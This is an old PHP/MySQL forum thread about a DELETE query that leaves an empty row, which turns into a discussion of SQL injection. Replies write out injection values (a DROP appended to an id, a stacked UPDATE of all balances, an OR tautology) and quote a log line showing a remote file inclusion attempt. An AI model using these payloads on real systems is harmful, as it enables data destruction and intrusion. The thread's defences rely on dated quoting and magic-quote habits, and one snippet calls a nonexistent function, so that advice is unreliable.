469,647 Members | 1,800 Online
Bytes | Developer Community
New Post

Home Posts Topics Members FAQ

Post your question to a community of 469,647 developers. It's quick & easy.

Delete row from mysql only deletes the contents?

mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");

There is the code but the result in my databse is that the ID number changes
from, lets say, 77 to 78 with 78's contents being empty. Therefore when I
look at the results - the deleted ID77 is gone but now I have ID78 with no
content!

Does anyone know why and how do I make it stop?

MIchael
Jul 17 '05 #1
20 3713
de Beers wrote:
mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");

There is the code but the result in my databse is that the ID number changes
from, lets say, 77 to 78 with 78's contents being empty. Therefore when I
look at the results - the deleted ID77 is gone but now I have ID78 with no
content!

Does anyone know why and how do I make it stop?


Your SQL query don't create a new empty row, you may have a bad if-statement
that makes your INSERT query to be run while you are deleting.

//Aho
Jul 17 '05 #2
"de Beers" <fd***@yahoo.ca> wrote in message
news:T4******************@news20.bellglobal.com...
mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");
Gah!!!

Always use the mysql connection id, and ALWAYS test database (and all other
IO) operations for errors!

$result = mysql_query("DELETE FROM cart WHERE ItemId='$ItemId'" , $conn);
if(! $result || mysql_error())
{
echo "Something went wrong with deleting this record: " .
mysql_error($conn);
exit;
}

ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;
There is the code but the result in my databse is that the ID number changes from, lets say, 77 to 78 with 78's contents being empty. Therefore when I
look at the results - the deleted ID77 is gone but now I have ID78 with no
content!


See Aho's comments
Jul 17 '05 #3
Hi CJ;

I am pretty new to php and mysql.

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg*********@slavica.ukpost.com...
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;


Could you explain this in a little more detail please?

TIA.

Charles...
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.742 / Virus Database: 495 - Release Date: 8/19/04
Jul 17 '05 #4
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:Fa********************@fe2.columbus.rr.com...
Hi CJ;

I am pretty new to php and mysql.

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg*********@slavica.ukpost.com...
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;


Could you explain this in a little more detail please?


You are passing raw data from the browser to your SQL statements. Supposing
I was a maladjusted twat, intent on make other people's lives miserable, I
could add SQL commands onto the end of a variable and effectively run my own
sql statements, such as a command to delete your cart database.

Jul 17 '05 #5
CJ Llewellyn <sa****@tmslifeline.com> wrote or quoted:
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;


Also, make sure the string you are inserting does not itself contain
your delimiter ;-)
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #6
"Tim Tyler" <ti*@tt1lock.org> wrote in message news:I2********@bath.ac.uk...
CJ Llewellyn <sa****@tmslifeline.com> wrote or quoted:
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;


Also, make sure the string you are inserting does not itself contain
your delimiter ;-)


that's what magic quotes are for shirley? ;-)

Jul 17 '05 #7
CJ Llewellyn <sa****@tmslifeline.com> wrote:
that's what magic quotes are for shirley? ;-)


You're being a little presumptuous. The guy only showed you one line of code
and you're drilling him on the lines you assume are _not_ surrounding that
one line. Maybe he gets the ID from his own code and doesn't need the delim
for security. Maybe he already does error checking or doesn't care if the
statement fails. And besides, maybe he doesn't like magic quotes (like me)
because he doesn't like things to go on without explicitly telling them to.

I know you're being helpful, but I guess the main thing that bothers me is
the "Gah!!!" and the several capitalized "ALWAYS"s.

--
eth'nT
Jul 17 '05 #8

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg**********@slavica.ukpost.com...
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:Fa********************@fe2.columbus.rr.com...
Hi CJ;

I am pretty new to php and mysql.

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg*********@slavica.ukpost.com...
ALWAYS delimit items in a SQL system using '. Otherwise you may be
vulnerable to SQL injection

removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;
Could you explain this in a little more detail please?


You are passing raw data from the browser to your SQL statements.

Supposing I was a maladjusted twat, intent on make other people's lives miserable, I
could add SQL commands onto the end of a variable and effectively run my own sql statements, such as a command to delete your cart database.


I gathered this much. What I was looking for was a little detail/explanation
in how one would "add SQL commands" and how to prevent them from doing it.

And... just what are "magic quotes"?

Charles...
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.742 / Virus Database: 495 - Release Date: 8/19/04
Jul 17 '05 #9
"Ethan T" <gt*******@SPAMMINmail.gatech.edu> wrote in message
news:cg**********@ngspool-d02.news.aol.com...
CJ Llewellyn <sa****@tmslifeline.com> wrote:
that's what magic quotes are for shirley? ;-)
You're being a little presumptuous. The guy only showed you one line of

code and you're drilling him on the lines you assume are _not_ surrounding that
one line.
Not assumptions, that was the code he was working with. Given the fact that
there are other potentially fatal flaws in his coding, and his own statement
that he is a newbie, I can safely deduce that is his own work.
Maybe he gets the ID from his own code and doesn't need the delim
for security. Maybe he already does error checking or doesn't care if the
statement fails.
Well he should be bothered about whether his statement fails, especially if
it leads to his whole database being dropped.

I've seen far too many tutorials skip over error checking. Which when
dealing with untrusted users is such a 'nightmarish' scenario, it needs very
firm underlining.
And besides, maybe he doesn't like magic quotes (like me)
because he doesn't like things to go on without explicitly telling them to.

He doesn't know what magic quotes are, so if nobody introduces him to them
he'll be non the wiser.
I know you're being helpful, but I guess the main thing that bothers me is
the "Gah!!!" and the several capitalized "ALWAYS"s.


It may be dramatic, but so again is having to reinstall your server,
explaining to customers that you've lost their order and their credit card
details are now in the hands of criminals.

Jul 17 '05 #10
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:GR*******************@fe2.columbus.rr.com...

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg**********@slavica.ukpost.com...
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:Fa********************@fe2.columbus.rr.com...
Hi CJ;

I am pretty new to php and mysql.

"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg*********@slavica.ukpost.com...

> ALWAYS delimit items in a SQL system using '. Otherwise you may be
> vulnerable to SQL injection
>
> removefromcart.php?PHPSESS=474984743&id=78;DROP%20 cart;

Could you explain this in a little more detail please?
You are passing raw data from the browser to your SQL statements.

Supposing
I was a maladjusted twat, intent on make other people's lives miserable, I could add SQL commands onto the end of a variable and effectively run my

own
sql statements, such as a command to delete your cart database.


I gathered this much. What I was looking for was a little

detail/explanation in how one would "add SQL commands" and how to prevent them from doing it.
You sql statement using the get variable id as the record identifier. As
your sql statement doesn't delimit the variable id, if you add extra SQL
syntax (statements) to the id variable on the url. This will then be
processed along with your DELETE statement.

Assumung that your id is in fact a numeric value, then

$id = (int)$id;

works wonders.

You should also write sql statements with delimiters like

INSERT INTO foo (field1 , field2, field2) VALUES ('$field1' , '$field2',
'$field3')

DELETE FROM foo WHERE id = '$id'
And... just what are "magic quotes"?


magic quotes is a php feature that 'Escapes' places a \ before certain
characters in browser (user) supplied variables. i.e. \ and '

Most seasoned programmers like them turned off, as the programmer likes to
manually prepare any data heading towards the database, and you don't need
to strip the extra slashes from the data to process it.

You should check whether it is turned on at the start of any script

http://uk.php.net/manual/en/function...quotes-gpc.php

And ensure your program can deal with the variables quoted or unquoted.
Jul 17 '05 #11
Hi CJ;

Thanks for the reply and additional infomation.

[snip]
You sql statement using the get variable id as the record identifier. As
your sql statement doesn't delimit the variable id, if you add extra SQL
syntax (statements) to the id variable on the url. This will then be
processed along with your DELETE statement.
Well, I guess I just don't have the mindset to try and screw stuff up,
therefore making it difficult to program defensively against it. I see where
$ItemId is not specifically delimited, so are you saying that one could
potentially do something like:

$ItemId = "'12'; DELETE FROM CART WHERE ItemId='3'; DELETE FROM cart WHERE
ItemId='44'"

or worse??

Just what kinds of "extra SQL syntax" could someone add? Just how bad could
it get (remember, I'm a newbie and still on the BIG learning curve)?

Are there other techniques to defend against such malevolent action by a
user??

Assumung that your id is in fact a numeric value, then

$id = (int)$id;

works wonders.
OK, I can see how this would drop any characters following the initial
numeric value of $id.

You should also write sql statements with delimiters like

INSERT INTO foo (field1 , field2, field2) VALUES ('$field1' , '$field2',
'$field3')

DELETE FROM foo WHERE id = '$id'
OK, this is how I write my SQL statements... but one *has* to use
delimiters, don't they? I guess I don't understand what you are telling me
here. Am I overlooking something about the use of ' (single quotes) vs. "
(double quotes)?
And... just what are "magic quotes"?


magic quotes is a php feature that 'Escapes' places a \ before certain
characters in browser (user) supplied variables. i.e. \ and '

Most seasoned programmers like them turned off, as the programmer likes to
manually prepare any data heading towards the database, and you don't need
to strip the extra slashes from the data to process it.

You should check whether it is turned on at the start of any script

http://uk.php.net/manual/en/function...quotes-gpc.php


OK, I checked this out and the output from "phpinfo()" shows:

1) magic_quotes_gpc=ON
2) magic_quotes_runtime=OFF
3) magic_quotes_sybase=OFF.

The output lists both "local value" and "master value" columns, so I will
contact my ISP to see if these can be changed.

BTW, is there a list of suggested values for all of the directives listed by
"phpinfo()"?
And ensure your program can deal with the variables quoted or unquoted.


Not exactly sure what you are telling me here. What is the difference
between a quoted vs. unquoted variable? Do you have a couple of short
examples? I would sure appreciate seeing an example or two.

TIA.

Charles...
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.742 / Virus Database: 495 - Release Date: 8/19/04
Jul 17 '05 #12
"Charles Crume" <cc@charlescrumesoftware.com> wrote in message
news:IQ*******************@fe2.columbus.rr.com...
Hi CJ;

Thanks for the reply and additional infomation.

[snip]
You sql statement using the get variable id as the record identifier. As
your sql statement doesn't delimit the variable id, if you add extra SQL
syntax (statements) to the id variable on the url. This will then be
processed along with your DELETE statement.
Well, I guess I just don't have the mindset to try and screw stuff up,
therefore making it difficult to program defensively against it. I see

where $ItemId is not specifically delimited, so are you saying that one could
potentially do something like:

$ItemId = "'12'; DELETE FROM CART WHERE ItemId='3'; DELETE FROM cart WHERE
ItemId='44'"

or worse??
That is it in a nutshell. For example I'm used to seeing this sort of stuff
in my web logs quite often. This is an attempt to use my site as a web
proxy.

201.9.9.140 - - [01/Aug/2004:10:33:55 +0100] "GET
/index.php?page=http://dorohoy.org/lila.jpg?&cmd=id HTTP/1.0" 200 11740

Needless to say it won't work in a month of Sundays, but script kiddies are
very persistant.
Just what kinds of "extra SQL syntax" could someone add? Just how bad could it get (remember, I'm a newbie and still on the BIG learning curve)?
If they know your host's naming convention for databases then they could
delete the whole database.

SQL injections have been used in the past to create a suid shell (command
prompt, running with higher permissions than it should do).

They could deface your web site, or steal your passwords.
Are there other techniques to defend against such malevolent action by a
user??
ensure fields are delimited, and that you have escaped any user supplied
data first.
Assumung that your id is in fact a numeric value, then

$id = (int)$id;

works wonders.


OK, I can see how this would drop any characters following the initial
numeric value of $id.

You should also write sql statements with delimiters like

INSERT INTO foo (field1 , field2, field2) VALUES ('$field1' , '$field2',
'$field3')

DELETE FROM foo WHERE id = '$id'


OK, this is how I write my SQL statements... but one *has* to use
delimiters, don't they? I guess I don't understand what you are telling me
here. Am I overlooking something about the use of ' (single quotes) vs. "
(double quotes)?

MySql & PostgreSql use single quotes as delimiters, MS Sql and Access use
double quotes.
And... just what are "magic quotes"?


magic quotes is a php feature that 'Escapes' places a \ before certain
characters in browser (user) supplied variables. i.e. \ and '

Most seasoned programmers like them turned off, as the programmer likes to manually prepare any data heading towards the database, and you don't need to strip the extra slashes from the data to process it.

You should check whether it is turned on at the start of any script

http://uk.php.net/manual/en/function...quotes-gpc.php


OK, I checked this out and the output from "phpinfo()" shows:

1) magic_quotes_gpc=ON
2) magic_quotes_runtime=OFF
3) magic_quotes_sybase=OFF.

The output lists both "local value" and "master value" columns, so I will
contact my ISP to see if these can be changed.

BTW, is there a list of suggested values for all of the directives listed

by "phpinfo()"?
And ensure your program can deal with the variables quoted or unquoted.


Not exactly sure what you are telling me here. What is the difference
between a quoted vs. unquoted variable? Do you have a couple of short
examples? I would sure appreciate seeing an example or two.


From the link above, this checks to see if php has automatically added
slashes, if not it'll add them:-

<?php
echo get_magic_quotes_gpc(); // 1
echo $_POST['lastname']; // O\'reilly
echo addslashes($_POST['lastname']); // O\\\'reilly

if (!get_magic_quotes_gpc()) {
$lastname = addslashes($_POST['lastname']);
} else {
$lastname = $_POST['lastname'];
}

echo $lastname; // O\'reilly
$sql = "INSERT INTO lastnames (lastname) VALUES ('$lastname')";
?>

Jul 17 '05 #13
Okay I am a newbie but here is the rest of the code.

- The id is sent from a checked box on their cart, the submit button is sent
to delete.php which has the script:

{
mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");
echo "Thank you! Information updated.";
echo mysql_error();
echo mysql_errno();
}

But I get no error. So please help me if you can. By the way I have an
include. that connects to the database.

As for the shouting- I don't mind - it makes me reluctant to ask for help
sometimes. ssoo - am I (a) vulnerable to a twat (b) and are my two echo's
enough of an error check.

But most importantly -!! Why does it not work? Someone mentioned an if
statement - in this case I don't use one - should I?

Anyway thanks for the help you can offer.
"CJ Llewellyn" <sa****@tmslifeline.com> wrote in message
news:cg**********@slavica.ukpost.com...
"Ethan T" <gt*******@SPAMMINmail.gatech.edu> wrote in message
news:cg**********@ngspool-d02.news.aol.com...
CJ Llewellyn <sa****@tmslifeline.com> wrote:
that's what magic quotes are for shirley? ;-)
You're being a little presumptuous. The guy only showed you one line of

code
and you're drilling him on the lines you assume are _not_ surrounding that one line.


Not assumptions, that was the code he was working with. Given the fact

that there are other potentially fatal flaws in his coding, and his own statement that he is a newbie, I can safely deduce that is his own work.
Maybe he gets the ID from his own code and doesn't need the delim
for security. Maybe he already does error checking or doesn't care if the statement fails.
Well he should be bothered about whether his statement fails, especially

if it leads to his whole database being dropped.

I've seen far too many tutorials skip over error checking. Which when
dealing with untrusted users is such a 'nightmarish' scenario, it needs very firm underlining.
And besides, maybe he doesn't like magic quotes (like me)
because he doesn't like things to go on without explicitly telling them

to.

He doesn't know what magic quotes are, so if nobody introduces him to them
he'll be non the wiser.
I know you're being helpful, but I guess the main thing that bothers me is the "Gah!!!" and the several capitalized "ALWAYS"s.


It may be dramatic, but so again is having to reinstall your server,
explaining to customers that you've lost their order and their credit card
details are now in the hands of criminals.

Jul 17 '05 #14
de Beers <fd***@yahoo.ca> wrote:
- The id is sent from a checked box on their cart, the submit button
is sent to delete.php which has the script:
But I get no error. So please help me if you can. By the way I have
an include. that connects to the database.


Like someone else said, it looks like your script is doing a new INSERT
somewhere else in the code. Write a very simple script that has nothing else
in it but:

[mysql_connect...select db, etc.]
$ItemId = 555; // replace with a real, valid ID
mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");
echo "Thank you! Information updated.";
echo mysql_error();
echo mysql_errno();

Just that code exactly, and see what the result is. If there's no problem
(it deletes properly and recreates nothing), you've probably got a problem
somewhere else. For debugging, I like to store my SQL statements in
variables and echo them anytime they're called for real. That way you see
exactly what's sent to MySQL.

--
eth'nT
Jul 17 '05 #15
[snip]
As for the shouting- I don't mind - it makes me reluctant to ask for help
sometimes.


You know, I consider a capitalized word or two as emphasized -- not shouting
(on the dBASE newsgroups I see *word* or _word_ -- not sure what these chars
signify exactly, but I've kinda picked up on using them). Think about it.
During normal conversation don't we all fluctuate our voices to emphasize a
word or phrase here and there? But we don't raise our voice for the entire
sentence, or paragraph -- that is shouting :-)

And... it doesn't discourage me for asking for help (and it shouldn't
discourage you either). Asking questions is the best way to get an answer to
a specific issue/problem.

What the heck, I ask lots of questions and some of them just gotta seem dumb
and/or stupid -- but I've always believed it better to ask and learn than to
not ask.

Charles...
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.742 / Virus Database: 495 - Release Date: 8/19/04
Jul 17 '05 #16
Hi CJ;

Let me be begin by thanking for you for your time and assistance!!!

[snip]
That is it in a nutshell. For example I'm used to seeing this sort of stuff in my web logs quite often. This is an attempt to use my site as a web
proxy.

201.9.9.140 - - [01/Aug/2004:10:33:55 +0100] "GET
/index.php?page=http://dorohoy.org/lila.jpg?&cmd=id HTTP/1.0" 200 11740
Very interesting! Thanks for the heads up.

If they know your host's naming convention for databases then they could
delete the whole database.

SQL injections have been used in the past to create a suid shell (command
prompt, running with higher permissions than it should do).

They could deface your web site, or steal your passwords.
Ouch!!! I didn't realize it could get that bad.

[snip]

MySql & PostgreSql use single quotes as delimiters, MS Sql and Access use
double quotes.
OK -- I was not aware of this -- back to the manual for a little more
reading on delimiters.

[snip]

From the link above, this checks to see if php has automatically added
slashes, if not it'll add them:-


[snip]

I had to alter the above script to use GET instead of POST:
----------------
<?php
echo get_magic_quotes_gpc(); // 1
echo "<br>";
echo "Get: " . $_GET['lastname']; // O\'reilly
echo "<br>";
echo "addslashes: " . addslashes($_GET['lastname']); // O\\\'reilly
echo "<br>";
if (!get_magic_quotes_gpc()) {
$lastname = addslashes($_GET['lastname']);
}
else {
$lastname = $_GET['lastname'];
}
echo "lastname: " . $lastname; // O\'reilly
echo "<br>";
$sql = "INSERT INTO lastnames (lastname) VALUES ('$lastname')";
echo "sql: " . $sql;
?>
----------------

to get it to run (and I added some <br> HTML so that I could more readily
see what was happening. The resulting output was:
----------------
1
Get: O\\\'Reilly
addslashes: O\\\\\\\'Reilly
lastname: O\\\'Reilly
sql: INSERT INTO lastnames (lastname) VALUES ('O\\\'Reilly')
----------------

I see where PHP inserted \ characters to "escape" (correct terminology??)
the \ and ' characters. This, of course, would mess up the value (i.e.,
lastname) being inserted into the table. Is this the point you are trying to
teach me, or is there some other issue I am missing?

TIA.

Charles...
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.742 / Virus Database: 495 - Release Date: 8/19/04
Jul 17 '05 #17
>Well, I guess I just don't have the mindset to try and screw stuff up,
therefore making it difficult to program defensively against it. I see where
$ItemId is not specifically delimited, so are you saying that one could
potentially do something like:

$ItemId = "'12'; DELETE FROM CART WHERE ItemId='3'; DELETE FROM cart WHERE
ItemId='44'"

or worse?? Just what kinds of "extra SQL syntax" could someone add? Just how bad could
it get (remember, I'm a newbie and still on the BIG learning curve)?
A lot worse. Think of the most destructive, malicious, or
money-stealing commands you can. DELETE with no where clause. DROP
TABLE. DROP DATABASE. Granting full privileges to a remote site.
SELECT on all of your credit card numbers. Adding a record for a
*big* refund to the attacker's credit card. Add a bunch of free
accounts. Change all your prices to negative large numbers.
DELETE FROM foo WHERE id = '$id'


Beware of the guy who fills in id with the value:

1'; UPDATE accounts SET balance = -99999999.99; DELETE FROM foo WHERE id = '2
or for that matter:
' OR 1 OR id = '

(substitute those in for $id and see what the result looks like.
The second one is dangerous even if multiple SQL statements per
query are not allowed.)
OK, this is how I write my SQL statements... but one *has* to use
delimiters, don't they? I guess I don't understand what you are telling me
here. Am I overlooking something about the use of ' (single quotes) vs. "
(double quotes)?


If you let me put delimiters into a web form and you don't end up quoting
them when they get into the SQL statement, you're in trouble.

If I can get a SQL error by putting one single quote or one double
quote into a web form, you're in trouble. In fact, if I can do
ANYTHING with a web form that can provoke a SQL error (failure to
find a record is not an error in this context; all I have to do for
that is enter a nonexistent ID number) on your server, you're in
trouble.

Gordon L. Burditt
Jul 17 '05 #18
"de Beers" <fd***@yahoo.ca> wrote in message
news:3q********************@news20.bellglobal.com. ..
Okay I am a newbie but here is the rest of the code.

- The id is sent from a checked box on their cart, the submit button is sent to delete.php which has the script:

{
mysql_query("DELETE FROM cart WHERE ItemId=$ItemId");
echo "Thank you! Information updated.";
echo mysql_error();
echo mysql_errno();
}

But I get no error. So please help me if you can. By the way I have an
include. that connects to the database. As for the shouting- I don't mind - it makes me reluctant to ask for help
sometimes. ssoo - am I (a) vulnerable to a twat (b) and are my two echo's
enough of an error check.
You need to look at your SQL statement

$sql = "DELETE FROM cart WHERE ItemId='$ItemId'";
$result = mysql_query($sql);
if(! $result || mysql_error() || mysql_num_affected_rows() < 1)
{
echo "An error has occured [$sql] : " . mysql_error();
}
else
{
echo "Elvis has left the building, or we have deleted your item from the
cart";
}
But most importantly -!! Why does it not work? Someone mentioned an if
statement - in this case I don't use one - should I?


You'll probably find that $ItemId is not populated.
Jul 17 '05 #19
"Charles Crume" <cc@charlescrumesoftware.com> wrote in
news:dw********************@fe2.columbus.rr.com:
You know, I consider a capitalized word or two as emphasized -- not
shouting (on the dBASE newsgroups I see *word* or _word_ -- not sure
what these chars signify exactly, but I've kinda picked up on using
them).


Way back in the old dial-in bulletin board days, (pre WWW) some ANSI
enabled software rendered them as *bold*, _underlined_, and /italic/. My
eyes still interpret them automatically ;)

--
Mark A. Boyd
Keep-On-Learnin' :)
Jul 17 '05 #20
Mark A. Boyd <mb****@sanDotrr.com> wrote:
Way back in the old dial-in bulletin board days, (pre WWW) some ANSI
enabled software rendered them as *bold*, _underlined_, and /italic/.
My eyes still interpret them automatically ;)


With OEQuoteFix, OE converts them automatically as well :)

--
eth'nT
Jul 17 '05 #21

This discussion thread is closed

Replies have been disabled for this discussion.

Similar topics

reply views Thread by Gordon | last post: by
4 posts views Thread by Yossi Naggar | last post: by
1 post views Thread by Dom | last post: by
6 posts views Thread by jefftyzzer | last post: by
By using this site, you agree to our Privacy Policy and Terms of Use.